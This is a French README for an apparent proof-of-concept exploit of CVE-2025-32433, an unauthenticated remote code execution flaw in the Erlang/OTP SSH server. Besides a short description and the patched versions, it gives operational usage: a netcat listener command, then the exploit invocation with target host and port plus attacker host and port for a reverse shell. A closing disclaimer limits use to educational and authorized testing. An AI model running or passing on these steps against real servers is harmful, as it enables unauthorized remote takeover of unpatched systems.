
PoC montrant une exécution de code à distance non authentifiée dans le serveur SSH Erlang/OTP. En exploitant une faille dans la gestion des messages du protocole SSH, un attaquant peut exécuter des commandes arbitraires sur la cible sans identifiants valides.
PoC montrant l'exécution de code à distance non authentifiée dans le serveur SSH Erlang/OTP.
En exploitant une faille dans le traitement des messages du protocole SSH, un attaquant peut exécuter des commandes arbitraires sur la cible sans informations d'identification valides.
Ce problème est corrigé dans les versions OTP-27.3.3, OTP-26.2.5.11 et OTP-25.3.2.20.
Configuration de l'écouteur :
nc -lvnp 1234
Exécution de l'exploit :
python3 CVE-2025-32433-dbs --rhost <TARGET_IP> --rport <TARGET_PORT> --lhost <ATTACKER_IP> --lport <ATTACKER_PORT>
--rhost : IP cible--rport : Port SSH cible--lhost : Votre IP pour le reverse shell--lport : Votre port d'écoute

Ce dépôt est à des fins pédagogiques uniquement. N'utilisez pas cet exploit contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation explicite de tester. Une mauvaise utilisation peut être illégale et est strictement interdite.